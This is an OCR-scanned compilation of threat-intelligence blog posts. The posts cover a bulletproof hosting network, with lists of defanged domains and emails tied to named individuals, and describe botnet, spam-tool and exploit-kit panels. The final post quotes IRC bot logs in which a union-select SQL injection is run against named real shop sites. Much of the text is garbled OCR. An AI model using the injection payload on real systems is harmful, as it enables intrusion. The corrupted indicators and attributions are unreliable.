hxxp://51lqm[.]online 


1, https: //blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEiaLXR346_181J JyQGBJ_7hOnUbY8NcnKN1i_DDLAKCpkgUL 
2, https: //blogger .googleuserconvent.con/ing/+/R29v22x1/AVvKeEgiahr®nl2ZqhZbawC34cWbTgg@iLyMNwfoY_COHOSOR 


19.1.4 Exposing Russian Business Network’s Mykhaylo Sergiyovich Rytikov’s AbdAIl- 
lah Internet Hizmetleri Bulletproof Hosting Provider on U.S Secret Service’s 
Most Wanted Cybercriminals List (2023-01-26 16:43) 


[1] 
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I’ve decided to share with everyone some actionable intelligence on one of the Russian 
Business Network’s primary franchise networks in Turkey namely AbdAllah Internet Hizmet- 
leri which back in the day used to be responsible for some pretty decent bulletproof host- 
ing malicious and fraudulent cybercrime activity in particular to offer actionable intelligence 
on [2]Mykhaylo Sergiyovich Rytikov it’s owner who’s currently on U.S Secret Service’s most 
wanted cybercriminals list. 


Known domains affiliated with AbdAllah Internet Hizmetleri: 
hxxp://tiket[.]cc 
hxxp://abdulla[.]cc 


hxxp://privateforum[.]cn - upomajuliya745@gmail.com; xpj88kf@gmail.com; 
316411856@qq.com 


[3] 
26521 


* 209000 101189 1SHt 201 ecftete?l 13477 e878 121 Meeltcsii7 CedtS 1 TT SefdneS* 04 $300 19842 ATC 1 hcdherdedcteecSsSecellrsset 1? cSlaItellecsTMeddeleitt 1 *lSesce 


Related known domains affiliated with AbdAllah Internet Hizmetleri: 


hxxp://ns1[.]srv4u[.]biz 
hxxp://bulletproof-service[.]com - Email: support@hosting-offshore.biz - 202.83.212.250 
hxxp://tarahost[.]net - Email: konstantin@karyaev.com - 89.108.73.93 


[4] 
31641 1856@aq.com « 
& S) ® 
y) & ») 
guruman.cn sety007.cn bye360.cn 


3: iG 3: 


od 1bIbSESS4a8c01b3de542c9S3a2adf a0 ifede522dda3280964a5a463a08abf dc2af7b95024de19d3f216e8725657ee 
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Related domains known to have been registered by the same domain registrant: 


hxxp://all-mafia[.]net 
hxxp://shampanskoe[. ]info 
hxxp://mashost[.]org 
hxxp://flexi-domains[.]Jcom 
hxxp://5pagess[.]net 
hxxp://extrasoft[. ]biz 
hxxp://golovolomka[. info 
hxxp://optical-coatings|[.]info 
hxxp://polevoil.]info 
hxxp://belorussial[.]info 
hxxp://3alab[.]Jcom 
hxxp://prezervativ[.lorg 
hxxp://brodyaga[.]net 
hxxp://skramedia[.]com 
hxxp://tarafree[.]Jcom 
hxxp://mp3-mmf[.]Jcom 
hxxp://myproga[.]net 
hxxp://extrahost[.]su 
hxxp://garanthost[.]com 
hxxp://grand-host[.]net 
hxxp://technormativ[.]info 
hxxp://xp-hosting[.]net 
hxxp://kredits[.]Jcn 
hxxp://tarahost[.]biz 
hxxp://tarahost[.lorg 
hxxp://optical-coatings-design[.]info 
hxxp://extrasoft-outsourcing[.]info 
hxxp://pm-tost[.]net 
hxxp://pm-sotovik[.]net 
hxxp://pm-ranlix[.]net 
hxxp://pm-holland[.]net 
hxxp://swlul[. info 
hxxp://valdiss[.]info 


hxxp://karyaev[.]Jcom 
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hxxp://x450[.]info 
hxxp://grand-host[. ]biz 
hxxp://flexi-classifieds[.]Jcom 
hxxp://flexi-sitebuilder[.]Jcom 
hxxp://flexi-projects[.]Jcom 
hxxp://bloggast[. ]info 
hxxp://pereezd-pro[.]info 
hxxp://eduaction|[. info 
hxxp://wmnakovalnya[.]com 
hxxp://retro80x[.]com 
hxxp://tarafree[.]net 
hxxp://skramedial[.]org 
hxxp://oldactors[.]net 
hxxp://tarahost[.]net 
hxxp://janimation[.]net 
hxxp://tarahost[.]Jcom 
hxxp://skramedia[.]biz 
hxxp://vv-want[. Jinfo 
hxxp://skramedia[.]net 
hxxp://olimp-sport[.]com 
hxxp://youhouse[. ]biz 
hxxp://kroleki[.]com 
hxxp://extrasoft-projects[. info 
hxxp://zelenaya[.]Jcom 
hxxp://cazinowm[.]com 
hxxp://extrasoft-outsourcing[.]net 


[5] 
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xpj88kf@gmsil.com 
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yusnii.com 
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67ae0ccbe8 5b8202e824f5c88dfa951b 


Related domains known to have been involved with AbdAllah Internet Hizmetleri: 


hxxp://magic-jackpot-cas[.]com 
hxxp://euro-vip-casino[.]com 
hxxp://royal-casino-vip[.]com 
hxxp://sexrusfuck[.]com 
hxxp://royal-cas-vip[.]com 
hxxp://2400-usd-casino[.]Jcom 
hxxp://royalcasino-vip[.]com 
hxxp://2400usd-casino[.]net 
hxxp://eurocasino-vip[.]Jcom 
hxxp://sinlife[.Jcn 
hxxp://byron-consulting-group[.]com 
hxxp://28-07[.]com 
hxxp://28-07[.]net 
hxxp://job-consults[. Jorg 
hxxp://837-86[.]lorg 


d039acfb7b0s053745f1 ed0fda05203f 
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hxxp://expressdeal[.]biz 
hxxp://cron[. ]li 
hxxp://crons[.]cc 
hxxp://cronos[.]mn 
hxxp://crinc[.Jmn 
hxxp://crinc[. Jli 
hxxp://ultrasmoke[.]cn 
hxxp://supersmoke[.]cn 
hxxp://globalsmoke[.]cn 
hxxp://937-86[.Jorg 
hxxp://cronco[. Jli 
hxxp://tradegroup-ha[.]Jcom 
hxxp://ha-tradegroup[.]Jcom 
hxxp://crinc[.]jp 
hxxp://tradegroup-ha[.]net 
hxxp://investmentcron[.]cn 
hxxp://glb-soft[.]Jcom 
hxxp://croninv[.]cc 
hxxp://cronis[.]cn 
hxxp://crons[.]Jac 
hxxp://cronn[.]eu 
hxxp://dkebooks[.]Jcom 
hxxp://cronoi[.]cc 
hxxp://jieod[.]Jcom 
hxxp://midgejs[.]Jcom 
hxxp://crin[.]ac 
hxxp://aoejf[.]Jcom 
hxxp://yseac[.]com 
hxxp://kaserid[.]Jcom 
hxxp://crin[.]Jcc 
hxxp://jekdoe[.]Jcom 
hxxp://ujeose[.]com 
hxxp://masiwer[.]Jcom 
hxxp://reusiwe[.]com 
hxxp://kaoeds[.]com 
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hxxp://iwoser[.]Jcom 
hxxp://planetOday[.]biz 
hxxp://xeirod[.]com 
hxxp://neusoas[.]com 
hxxp://geoepd[.]Jcom 
hxxp://efuyr[.]Jcom 
hxxp://ziude[.]Jcom 
hxxp://polsenstanford[.]Jcom 
hxxp://heyud[.]Jcom 
hxxp://wogkr[.]Jcom 
hxxp://seiudr[.]Jcom 
hxxp://aosier[.]Jcom 
hxxp://dueor[.]com 
hxxp://crins[.Jac 
hxxp://verbespecially[.]Jcom 
hxxp://fivejoy[.]Jcom 


hxxp://riverwomen|[.]com 


hxxp://trianglesentence[.]com 


hxxp://floorside[.]com 
hxxp://developtail[.Jcom 
hxxp://womanfinish[.]Jcom 
hxxp://alwaysfell[.Jcom 
hxxp://differcollect[.]Jcom 
hxxp://goodalso[.]com 
hxxp://kingbrought[.]Jcom 
hxxp://findcharacter[.]com 
hxxp://chanceexpect[.]com 
hxxp://beardictionary[.]Jcom 
hxxp://forwardfield[.]Jcom 
hxxp://tinydown[.]com 
hxxp://jobwhether[.]Jcom 
hxxp://numeralcity[.]com 
hxxp://cronin[.]jp 
hxxp://equalcatch[.]com 


hxxp://streamwho[.]com 
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hxxp://selectmonth[.]com 
hxxp://propercame[.]Jcom 
hxxp://grewsoil[.]Jcom 
hxxp://townslip[.]Jcom 
hxxp://stationheavy[.]Jcom 
hxxp://charactereven[.]com 
hxxp://milkOsoft[.]Jcom 
hxxp://goldverb[.]com 
hxxp://windowlisten[.]com 
hxxp://bqgqnfc[.]Jcn 
hxxp://wrbhnuw[.]cn 
hxxp://a9da6[. org 
hxxp://04ccc408[.]org 
hxxp://bdb7beb6[.]org 
hxxp://scalespread[.]Jcom 
hxxp://thencloud[.]com 
hxxp://figurespoke[.]com 
hxxp://fullfraction[.]com 
hxxp://propertytall[.Jcom 
hxxp://beautyfig[.]com 
hxxp://nadover[.]Jcom 
hxxp://followsalt[.]Jcom 
hxxp://staysay[.]com 
hxxp://nerexcept[.]Jcom 
hxxp://thanscore[.]com 
hxxp://humanthus[.]com 
hxxp://branchfelt[.]Jcom 
hxxp://areacountry[.]Jcom 
hxxp://meetduring[.]com 
hxxp://movestood[.]Jcom 
hxxp://stillverb[.]com 
hxxp://suggesteye[.]com 
hxxp://preparebut[.]com 
hxxp://hurrysound[.Jcom 
hxxp://cookcompare[.]com 
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hxxp://Odaycod[. ]biz 
hxxp://europeansmoke[.]cn 
hxxp://sprybog[.]net 
hxxp://taybaol[.]Jcom 
hxxp://polsenstanford[.]Jcom 
hxxp://bconsgroup[.]com 


_ https: //wuw. secretservice .gov/investigation/mostwanted/rytikoy 
5. https: //blogger .googleusercontent . com/img/b/R29v2Z2x1/AVVXSE jM3VKosERZt2dAX6DF 1v1 Loy j_1-Ti8cHYMEtOAcTXHhEDd 


19.2 February 


19.2.1 A Peek Inside the Zalupko Accounting Data Stealing Malicious Software Bot- 
net - An Analysis (2023-02-06 23:08) 


1 


oo 
—_— 


{ ‘alupKo 


Sources: CUTE FTP(29%) FAR(43%) FlashFxXP(29%) 


1s 


tp a 
x0)! Se Pe ieee) CRAY Seanad) Poca) ae 


7 123 123 123 no no no no 
6 com.com user pass no no no no 
bo) yandex.ru qaz qazedc no no no no 
4 x1xx.com zx lccy¥ 1243 no no no no 
3 xxx.COmM zxcty 123 no no no no 
2 lll 123 321 no no no no 
1 ftp.globalscape.com qaz edc no no no no 


Who would have thought? Takes you back doesn’t it? As I’ve been going deep inside my old 
threat intelligence archive circa 2008 I’ve decided to share with everyone several never 
published or released before screenshots of the Zalupko accounting data stealing malicious 
software release botnet with the idea to raise everyone’s spirit in the field of fighting 
cybercrime and doing research and possibly take your research motivation higher. 


Sample screenshots include: 
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[2] 


URL Get / Loaded GEO Sort Ready Unk 
© td Aoetigmagegpre any SR a ONRITE | (CU) 1613 / 866 PT, SE C2) 43% (unt) 
She pee (E) (CU) 1022 / 708 PL 2) 35% [unt] 

URL C  iaplewataivad 
Limit al: 2000 , per 2 hour: O 
loaded 708 , last hour 16 , last load 21:48:36 
Get 1022/ 21:48:35 
GEO PL 
Build 
Status running 
Clean no 
Action [start/stop] [delete] 
a ' [cu} 427 / 205 DK 12) 21% [yink] 
ees -+ 
2 hipaa ee) 2878 / 1343 us (2) B4% (unt) 
© http: / ARRAN /ve.exe TE: 2315 / 1139 GB C2) 57% (in! 


@ nage een ORD Matias Bie fe) (cu) 1399 / 651 ES C2] 16% [unt 
* htt LTA erse (E) (cu) 19895 / 11594 CO] 41% (uit) 


© ttn Rien NORE] (C1 233612 / 147596 2) Unilim (ut) 
© hte TAA ct RIS OEE) [CU] 105 / 69 C0} 14% (rink) 


F 
3 


F 


ez 


[3] 


Total (3 days): 1569/0 
Online:: 1466/0 
New bots (2 hours): 1569 
New bots (24 hours): 1569 


@ axcz2) 
@ cacis) 
paces 
@ wiciow> 
B rc) 
@ 1037) 
 1nc159) 
B seczs> 
cN(31) 
B us«i20> 


IN 158 / 150 10% 
™ 12/12 1% 
1p 25 / 24 2% 
CN 31/26 2% 
NL 2/2 0% 
US 120/110 8% 
SE 1/1 0% 
BG 3/3 0% 
CL 12/11 1% 
NG 1/1 0% 
IT 7/7 0% 
eee 51% 
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[4] 
Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEjUrjpoFSfWmpYkPYRWTuWT7GZpUt£PfVOuugzg173txi9wz 
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19.2.2 A Peek Inside the Xedant Human Emulator Spam Tool - An Analysis 
(2023-02-06 23:09) 
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Dear blog readers, 


In need of a decent example of a sophisticated spam tool that’s truly capable to bypass any 
web site’s anti-spam defense including basically any known CAPTCHA including to also 
automate the process to the point where the actual bad guys behind the infamous Xedant 
human emulator are truly capable of causing widespread spam havoc internationally? Think 
about the Xedant human emulator tool circa 2008. 


Sample screenshots include: 
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Stay tuned! 
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19.2.3 A Peek Inside the Xrumer Spam Tool - An Analysis (2023-02-06 23:09) 
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Who would have thought? It’s an unknown period of time within the cybercrime ecosystem 
and I’ve decided to share exclusive screenshots of the infamous Xrumer spam tool which 
basically used to and continues to dominate the spam marketplace by possessing a variety of 
advanced and sophisticated features making it easy for everyone to enter the world of spam 
globally. 
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Sample screenshots include: 


[2] 


XRumer 4.0, Copyright Botmaster.Ru, Support ICQ 178730725 
Qpoext = Hc TpyneHTol 


Hactpowkn  KypHancoberrmi = PacnucaHne CamoobyweHne 


f” | rumer 


Onarvne! = Md opmauna 


ikoliz) 


MnTepderic nporpanmt! 
BO Pexnm HOBHUKa = (@ Hopmancrest peram 


J] basa cceinox ak: 


——————— 


YNPABNEHKE NOCTHHFOM: SK THBHBIX NOTOKOB O 


Tekyuiaa nosuuna none it elt hee ea sbaad beeen nme A 


---> CCbINKy ANA NPOBEPKK Aemo-Bepcnn aaa BBOAHTb 3AECb <--- [=> Coun aMToRORRH AeHO-eepCETeCEMAND ORT ae 


x 


[3] 
26534 


@ XRumer 4.0, Copyright Botmaster.Ru, Support ICQ 178730725 9e9 
Qpoext HcTpymeHTbi HacTpowkH XypHancoGeirmi PacnwcaHne CamoobyyeHne  Mnarnnb!  Mkdbopmauna 


lallarlsle 


Bl Texsmmanooecr: Test . On ste: XRumer 3.0 + Hrefer 20 


Vrrrepderic nporpammtt 
“PO Pexmicona PS. © Hopnanctesi pexoet Asem uxteppelica: Russian a | 


_) Orwéte: Moura @ AxoHimeocte \—) HactporiKn | 


Homep 6a3bi cebinoK: 2 > LinksList ¥ Noapo6xHocm... 


YNPSBNEHKE NOCTHHEOM: KTHBHBIX NOTOKOB 


Tekywaa nosuuua 0 ( ) 
CrapT c nayana NpozonxuTe c nocnegHe nosnunn CtTon 
Nocrner ¥ ---> CCbINKy ANA NPOBEPKH AeMO-BEpcHh HEOBXOAHMO BBOAHTb 3AeCb <--- Teer >>> 


[4] 


26535 


26536 


XRumer 4.0, Copyright Botmaster.Ru, Support ICQ 178730725 
Qpoext  W4HcTpyweHTbi Hactpokn MKypHancofbirmi PacnwcaHme  Camoofyyenne  PAnarntb! = MHdopmayna 


| Ld Texyuiwi npoext: Test On ste: XRumer 3.0 + Hrefer 2.0 


UrTepderic nporpammbt 
a Pexnm HOBHYKa mul (@ Hopmanbibst pewom Asem unTeppelica: Russian 


Basa cceinok| |) Orwétbi Mowta @ AxoHimeocTe (=) Hactpolixn 


Homep 6a3bi cebinoK: 2 > LinksList v, NoapoSriocTn... | 


YNPABNEHKE NOCTHHFOM: SKTHBHDIX NOTOKOB 0 


Texywaa nosuuva 0 Il ESE See Se See eee eee eee th 


[ceerem ce 


Nocrwrer v ---> CCbINKy ANA NPOBepPKH AeMO-BEPCHh HEOHXOAHMO BBOAHTb 3AeCb <--- Tect >>> 


Nt QO Mporpece 8 Covina 


[5] 


AutoMAMBA! y0.30a - for XRumer 4.0 Platinum Edition 
Nower [c6op) axe: 


X Mor) 18 \a0 | 27 | YJ) Ceor0 


Orkye: Poccua, Mocksa v 


— 


Punsrp: | Kro na caire vo 
[_] VIP [¥) Bes npeanoxersid "WHT sa aeHeru” 


Paccpinka 

AHKeTbI 
VcnonbsopanHbm: 742 
Octanoct: 161 

3a TeKyuuo CeccHN: 
Coofw.otnpasnero: 0 
Oww5ox: 0 
Orxnonero: 0 
Orgunetposaro: 0 


Tect Punetp... 


Maxcun Nywkapés 6 ceTH 


[6] 


Kompep rep CChimoK 
Bestop watinoroe Betop arecopa Meron remepausat 
©  <abeets (url)> Qreyword)</a> O Bpare aemop us weaerse gains [) 8 cronteu 1) B crpony vepes 
© | [ute fut keyword) ual] © Bpare anop us catgomena 
© tut - thepword) © Bpare emop us crucka nocnencesterHo 
oO © Bpame amop 13 crncna creatineen o6pasom 


© Cremapmas resepauer 
© Serpe 10 cox wadnonon crcxa [no owpean| 
© Connarne sapsiaue [no cceame na paper 


0 © Cosnarue sapesusat [pappiposare Comune H sex opti) 
oO © Bpare no 2G  aemopa us cricea [emai] Bapuawer 1.1.1.1} 


Creacon. copimon, Crascon arnopos: Pesyerar. 


2) Nlepesop pcex arnopoe 13 CNMCKa ANA Kao CCUM 


http: //s1.domen. com/a php A A <a hvet= hitp://s1 domen.com/a phe arniop! </a> a 
hip. //s2 domen conv phe <a heels batp.//22. domen conv phen aop2</a> 
hit. //s3. domen.com/c pho <a het= hitp://s3. domen com/c php srnop3«/a> 
hig. //o4. domen conv'd php <2 wel» hitp://e4. domen com/d php arnopl </a> 


bite //s5. domen com/e php <a bwel= http: //s5 domen com/e phd arnop2«/a> 


[7] 
26537 


fpadeveckoe npeactaprenve oT4véTon 


Ba 
— O Speer 


arpysure Gasy 4 oTretret 


Noctpoure rpagex pacnpemenersta no Gaze 


Coxparacre Heodpaxerie 8 Qarn GraphReport of 


< 


¥ | [SMF Forums 


Jluarpanma npo6usasemoctn 


Hig |g |e | 1g 


[8] 


fpadeyecioe npeactasrenve oT4éTOD 


Coxparaere nsodpaxere 6 pain GraphReport of 


[9] 


26538 


Ananv3aTop npvsHakos CccbinoK [x] 


[Come i 


[10] 
26539 


MpoctoTp npoexra 


ACTENA Camooby Hered: YNPABREHHE » DESY MD TaTbt 


reg 


ii ili Loe 


it 


; 


= ssoOooooo0ossssqcooossoooo 


26540 


Hactpovku cuctembi camoobyyueHna 
SNOUT b PexHM Camoo6yyenus: 


Tunbi none ana aHanusa Qofasnarb none ana o6yyeHua, ecnu: 


Popmy SaNONHUTb NONHOCTbIO He Yaanocb. 
[¥] Input typestext [¥] Textarea (O} . 
[¥} Input typ wv COOSWEHHE HE OTNPaBNeHO 


Input type=checkbox re) Popma 6bina sanonHeHa, HO PesynbTar - 
“TlonyycnewHbie"™ 


[_] Input type=radia 


oO Qofasnare NOBbIE HesBecTHble nona Hs 


Select opm, rae ectb TEXTAREA 


CoxpaHarb TEKCT NOACHEHHH, HANHCaHHbIx NEpeg NonAMu 
AsTomarHyecku YTBEPALaTb NPEANONOKEHHE NPOrpPammb! O SHSYEHHH NoONA 


BHocutb gaHHoe none Ha camoo6yyenve, ECAH OHO BCTPETHNOCk Kak MHHHMYM Ha: 


1 PaSHbix Cairax 
CoxpaHutb BoccTaHoBHTb SHaYeHHA No yMoNyaHHio 


[13] 


Cuctema pacnmcannn 


< 
PegakTuposanve co6emua 


Codemue: 


Deticreve: 


Jlo6asurp co6prue Yganurb co6prnue 


Nponyctute coéerve Ouvcturt ecto Ta6nvuy 


[_] Ysenomnarh o nepexoge Ha CheAYyOULYyIo SanaY¥y No NoYTE: 


C] Cuctema pacnucanwa exmoyena 


[14] 
26541 


AlononmvuTenbupie HacTpornKn 


Paccoinka Vrrepdetic 

{_] Tombxo perucrpauua (6e3 noctunra TeKcta) (J Asrosanycx npueemoge [¥] Mormropuxr 

(_] O6asarensian peructpauva nnioc noctHHr BusyanbHbie sppexre (_] He coxparare Hacrporixu 
[[] Pacceinka or paree sapervctpuposantioro nonbsoBarena [] Orkmousre rpaguueckil noroTun nporpamevtt 

{_) Pexum sxcnpecc-pacctinxu [7] Orkmousrs ta6nuuy monuTopHMra noToKOS 


CL) Aeronponommerie Npu Hakan Ha “Crapt c Havana’ 


MaKcHManbHell pasmep Sarpymaemon crparwabl, KG: 400 [¥] Yaanare crappie oryert: ["Ycnewrie™, ‘Tlonyycnewxtie™ etc.) 


MakcHmanbHOoe KONMYECTBO CCBINOK Ha CTPaHHUe: Ee () Ynanare texyue Z-, R-, E- 1 M-6ases 

Aveaat ommnaniia GET -sanpoca, cer: a | CneuvanbHele YCNOBHA aHOHMMHOCTH 

Sliver ommaaHHA POS T-sanpoca, cex: 100 He oTnpaenATb COOOULEHHE Ges NpOKCH 

(7) Denar, nosropeis noneerxs nou Tafesayran [_] Paspewurb noct Ges npokcw 6 NPHOPHTETHHIE Pasqenbi 


[¥] Bkmowte o6pasorky ppetimos OrvétHoct 

[) Ecau ne pa6oraer BB-kog - Tparcqpopmuposars ero es HTML [¥] Neaposrese orvérei (Result: ...) 

[¥) Bkmowns anropurm skonomuM TpappuKa [¥] Coxpansre 8 Z-Gasy CobinkH, Ha KoTOpbIK TheGyeTCa aKxTHBAUL 
[") Bxmowne pegenam [_] Bectu nor enuckos pasaenos Ha popymax (CategoriesLog. txt) 


t t i 


Hactpote WHCTpyMeHTOB 
Noct-ofpasorka cceinok: [¥] Npveoaure copinku popymos k uMaeKcy [_] O6pesare cceinkuao"?" [_] O6pesart ccninku ao "/" 
Unanerue nostoprem: @) Mo xoctHefimy [hostname] © No sceti cceinke [ao nocneaHero "/") 


[15] 


default. wtpr - WordTracker & BidCheck v0_5a 


Stay tuned! 
26542 


NTROOUSTION sche Cun eres CONTACT us 


it Mt the begrens. F 


Qe 
tute 
mmr 


Why b Panama s 


no Panes 


wa Let er Gone ry 


AR, ee A RP PS ye HRY LIP Nap OO ee 


Womens SIA tate) Ames Say eae 
RTD MINT, «Een 
AbD IS HOD Ogre ad itn ret Ane 
ee ee ee a 
or tev ey 
wee GI er> Fees 


heen a menting he 
9d yD thet UG 

S99 Pa Row, 
Ay AAD © Een of Wen 
ee rad To) 
r4e vente 
ok tee Mae 
618 Feel 


— - ON a >See 
‘ Pw wl te pet ine 
dpe oem NEE OE tte os F 


rks Le et ae OR 


~t oe Or 


=e 


Ory Pama et ower ls + 
AOR. Pe tekee Be 


ee eee ate 


ar ENE OY OTD 
I OF he aan DR. tt 
aire yee 


RAG eh oA PA 
Pee) oe ae es 
ee eo 

Pyins othe be ne 


aN ed ra 
y an} aN ene 
ora een 


a 


—— 
+ Ae oe we ES 
a ee 


a ete 
Reet ea Pe 


PORTFORS 


2657 


py 


ttps://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEi8nDC6IisBqnURx0Yk5dhQr 1357 j botaaeKp8DOpTDX j YQ 
xdE_HnT4td8DcqIBqD27KbKdqoViqe20-ox1UI4KDLq7CRB7YpXpXo 


. https: //blogger . googleusercontent.com/img/b/R29vVZ2x1/AVvXsEipvsuvL-Zx0RePxbqQH- uFWyX05F 3wPunfqgVpR8- jQEfz 
aPG jGX9SBf5o004fMKxW_NtI4kCjHjIFkO1JsbfpnncGGRHqU9DUsFk 


ttps://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEj J9QUeak jm_wRdAwXr7b5k40JT JHNTwWbirxtPnQCWaP2UY 
XAInhhOqq j8BSmB19d60ZA3c1YL-r6o0eUvVf£85b2eWFmhc36P jLH 
ttps://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEjYGqpvblocdRDtvAOAdkIkI6SgISIAWI8vMF 1uvWHJd-EpP 


1011 FnLVQ3MNd75pWbb3F eBr58Gs JKfZ4KKuzhMeOxXVVgkUQpick 


. https://blogger. googleusercontent .com/img/b/R29vVZ2x1/AVVvXsEiK6NmM- 17xam4YKOkstnSLmine_pxSFkW4A-BS111AAi6N. 


ytNrcezJIhvCfVrawAu0qtqiXa6FSGsDNzrIShdGclRut2-aFtOLYvE 


ttps://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEjq24F1m-mpStn091ISEYOpV19cofd_VonhawhmPLzbbrKLP 


f£q7GEdxzLXGhZe9HaGU3RowNFHgfO0pGV9hrY091MeC5m- j-dAbY3n 

OXTTE6CleUJYcFIpwNa_nc7M-xKTGF5v1Mid-aSmVYo- Jv8fVWOys: 

. https://blogger. googleusercontent .com/img/b/R29VZ2x1/AVvXsEibjBzVFC- y7opr7vgXyfUtq4WtRqyLFloMgtrcfJ7A-eizp 
9. https: //blogger. googleusercontent .com/img/b/R29vZ2x1/AVvVXsEj 1o0Jybc9GOsO_AFcKXI-UF9cQrGq- vHXFk4tfRHiW_QW2¢ 
BQkz15hp9U41v84j InhXRPU3LRDtrOLYnswUrhzrThW2vo5ihg_N7InC 

12. 
4. 
15. 


H H H H 
w | 


19.2.4 A Peek Inside A Web Malware Exploitation Kit - An Analysis (2023-02-06 23:09) 
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Dear blog readers, 


I’ve decided to share with everyone yet another post part of the "an image is worth a 
thousand words" blog posts series. Takes you back doesn’t it? In this post I’ve decided to 
share with everyone a never released and published before screenshots of a well Known web 
malware exploitation kit with the idea to showcase the ease of use and easy to implement 
client-side exploit vulnerabilities exploitation on a mass scale. 


Sample screenshots include: 
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Stay tuned! 
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19.2.5 A Peek Inside a DIY iFrame Embedded DDoS Attack Script Targeting Iran- 
Based Web Sites - An Analysis (2023-02-06 23:10) 
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With basic iFrame injecting scripts making their rounds back in 2008 including their use and 
participation in actual crowd-sourced DDoS attack campaigns internationally I’ve decided to 
share with everyone a sample screenshot of a sample iFrame DDoS script that was actually 
known to have been involved in a successful DDoS attack against major Iran-based web sites 
back in 2008. 


Stay tuned! 
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19.2.6 A Peek Inside a Mass SQL Injection Scanning and Exploiting IRC Botnet - An 
Analysis (2023-02-06 23:10) 


[1] 
< > tschema http://www. | /shop .php?catid=@+runion+select+1 ,nullarea,3 
< {BoT]> [+] Table :]: Column :]: Database 
< [poT]> [*] CHARACTER _SETS :|: DEFAULT _COLLATE_NAME =]: information_schena 
< [BOT ]> [t] CHARACTER_SETS :|: DESCRIPTION :|: information_schema 
< {Bot ]> [t] CHARACTER_SETS :|[: MAXLEN :]: information_schema 
< {goT]> [t] COLLATIONS :]: COLLATION_NAME =|: information_schema 
< {BoT]> [t] COLLATIONS :]: CHARACTER_SET_NANME :|: information_schena 
< {pot ]> [t] COLLATIONS :]: ID |: information_schena 
< [BoT]> [t] COLLATIONS :]: IS_DEFAULT :|: information_schena 
< {BoT]> [t] COLLATIONS :]: IS_COMPILED :|: information_schena 
< {pot ]> [t] COLLATIONS :]: SORTLEN =]: information_schena 
< {BoT]}> [!] COLLATION_CHARACTER_SET_APPLICABILITY ty: COLLATION_NANE =|: information_schena 
< — [BoT}> [t] COLLATION CHARACTER SET APPLICABILITY :]: CHARACTER SET_NANE =]: information _schena 
< {pot ]> [*] COLUMNS =]: TABLE_CATALOG :|: information_schema 
< {[BoT]> [?] COLUMNS =|: TABLE_ SCHEMA :|: information_ Schema 
< {Bot ]> [t] COLUMNS =]: TABLE NAME =]: information _schena 
< {[goT]> [?] COLUMNS =|: COLUMN_NANE :]: information_schena 
< (BoT]> [t] COLUWNS =|: ORDINAL_POSITION =]: information_schena 
< [poT]> [t] COLUMNS :|: COLUMN_DEFAULT :]: information_schena 
< [BoT]> [*] COLUMNS :|: IS_NULLABLE :]: information_schena 
< {Bot ]> {t] COLUMNS =|: DATA_TYPE :|: information_schena 
< — [poT)> [t] COLUMNS =]: CHARACTER_MAXIMUM_LENGTH :|: information_schema 
< [BOT ]> [?] COLUMNS =|: CHARACTER_OCTET_LENGTH :|: information_schena 
< {BoT]> {t] COLUMNS :|: NUMERIC_PRECISION :|: information_schema 
< [pot ]> [*] COLUMNS :]: NUMERIC _SCALE :|: information_schema 
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Who would have thought? A mass SQL injection scanning and remotely exploitable including 
fuzzing capabilities built-in IRC-based botnet? I’ve decided to share with everyone some sam- 
ple screenshots on the process with the idea to raise everyone’s awareness that what used to 
be once a rocket science is today’s reality in specific back in 2008 when | originally took these 
screenshots. 


Sample screenshots include: 


[2] 


<@AlpHaNiX> tschena http://www.hopkinsonit .con/shop.php?catid=G+runiontselect+1 ,nullarea,3 

<Nul1(BOT]> AlpHaNix [+] Table =]: Column :|: Database 

<Nul1[B0T]> AlpHaNix [t] CHARACTER_SETS :|: DEFAULT _COLLATE_NAME =]: information_schena 

<Nul1[BOT]> AlpHaNix [¢] CHARACTER_SETS :|: DESCRIPTION :|: information_schema 

<Nu11[B0T]> AlpHaNix [ft] CHARACTER_SETS :|: MAXLEN :|: information_schema 

<Nul1[B0T]> AlpHaNix [*] COLLATIONS :]: COLLATION_NAME =|: information_schema 

<Nu11(BOT]> AlpHaNix [*] COLLATIONS :|: CHARACTER_SET_NANE z]: information_schena 

<Nu11[B0T]> AlpHaNix [tf] COLLATIONS :]: ID :]: information_schena 

<Null[BOT]> AlpHaNix [*] COLLATIONS :]: IS_DEFAULT :|: information_schema 

<Nu11(BOT]> AlpHaNix [f] COLLATIONS :]: IS_COMPILED :]: information_schena 

<Nu11[B0T]> AlpHaNix [t] COLLATIONS =]: SORTLEN =]: information_schena 

<Null[BOT]> AlpHaNix [!] COLLATION_CHARACTER_SET_APPLICABILITY tI: COLLATION_NAME :|: information_schena 
<Nu11[BOT]> AlpHaNix [t] COLLATION_CHARACTER_SET_APPLICABILITY :]: CHARACTER_SET_NAME =]: information_schena 
<Nul1[(B0T)> AlpHaNix [ft] COLUMNS :]: TABLE _CATALOG :|: information_schema 


<Nul1[BOT]> AlpHaNix [] COLUMNS :]: TABLE_ ~ SCHEMA z|: information_ schema 
<Nu11(B0T}> AlpHaNix [t] COLUMNS =]: TABLE_NANME =]: information _schena 
<Nul1(B0T)> AlpHaNix [] COLUMNS =]: COLUMN_NAME =]: information_schena 
<Nul1([BOT]> AlpHaNix [] COLUMNS =|: ORDINAL_POSITION :|: information_schena 
<Nul1[B0T]> AlpHaNix [t] COLUMNS :]: COLUMN_DEFAULT :]: information_schena 
<Nul1(B0TJ> AlpHaNix [*] COLUMNS :]: IS_NULLABLE :]: information_schena 


<Hul1[B0T)> AlpHaNix [t] COLUMNS : 
<Mu11(e0T]> AlpHanix [t] COLUMNS : 


: DATA_TYPE :|: information_schena 
: CHARACTER_MAXIMUM_LENGTH :|: information_schenma 


<Nul1(BOTJ> AlpHaNix [*] COLUMNS :]: CHARACTER_OCTET_LENGTH :|: information_schena 
<Nu11[BOT]> AlpHaNix [ft] COLUMNS :]: NUMERIC_PRECISION :|: information_schema 
pcb es steric H Beenelncalld bigearcitgger gat nage mei jg 

[3] 
cr ~“{BOTJ> — ~~ —«&L J Possible MySQL Vulnerable Website -> hi :://cht ‘:lat-  -monde 
a [BoT]> [*] Trying To Fuzz http://www.) tfo sear. im/shoj; ihp?c id=8&s 
A) [BoT]> [*] Trying To Fuzz http://supp: sho Il/st i.php?t ‘id=3 
